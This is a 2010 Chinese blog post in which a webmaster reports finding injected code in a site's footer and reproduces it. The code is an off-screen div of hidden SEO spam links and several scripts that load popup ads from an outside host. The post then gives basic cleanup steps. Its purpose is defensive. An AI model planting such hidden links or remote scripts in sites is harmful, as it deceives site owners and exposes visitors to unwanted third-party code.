asphack 黑链和弹窗脚本注入

原本想在一个站上装一个PHP的蛛蛛记录程序,打开网站发现一直在弹窗!发现页面底部有一段如下脚本:

<div style="position: absolute; top: -999px;left: -999px;">
<a href=http://www。0daynetcom/>最新漏洞|最新0day发布</a>
<a href=http://www。asphackcom/>脚本渗透|渗透入侵</a>
<a href=' http://www。cnhacknet。com/">网络安全网</a>
<a href="http://www.baidu.com">百度</a>
<a href="http://www.google.cn">谷歌</a>

<script type="text/javascript"> 
  u_a_client="1";
  u_a_width="0"; 
  u_a_height="0"; 
  u_a_zones="30"; 
  u_a_type="1"; 
</script>
<script src=http://code1。wyunion。com/l/tan/alltan.php?hl=asphack></script>
<script type="text/javascript"> 
  u_a_client="1";
  u_a_width="0"; 
  u_a_height="0"; 
  u_a_zones="30"; 
  u_a_type="1"; 
</script>
<script src=http://code1。wyunion。com/l/tan/untan.php?hl=asphack></script>
<script type="text/javascript"> 
  u_a_client="1";
  u_a_width="0"; 
  u_a_height="0"; 
  u_a_zones="30"; 
  u_a_type="1"; 
</script>
<script src=http://code1。wyunion。com/l/tan/alltan.php?hl=asphack></script>

 

这种事情经常发生,虽然使用的计量一样,但是操作的人和方法多少有些差异!有类似问题的朋友可以从以下几步着手解决:

1、先排除是电脑病毒所至,先检查HTML中是否有恶意脚本。

2、检查CMS模版中的全局通用文件是否有恶意脚本注入,首页和底层页也要检查。

3、以上两个方面排除后如果还是没有解决就要查看程序了!不过一般没有权限往程序里写入!

 

最后鄙视一下这些恶意注入的站长或公司!要一些外链赚俩钱,啥缺德事都干!同时也提醒一下这些人,最好只搞一种注入,又插入链接又插入脚本的!只要有人维护的网站都会立马发现!不要太贪了!

另,广大站长一定要做好网站安全,在有实力的公司购买产品,避免使用默认的CMS模板和默认的配置!

posted on 2010-03-29 22:30  pittzh  阅读(415)  评论(0编辑  收藏  举报

导航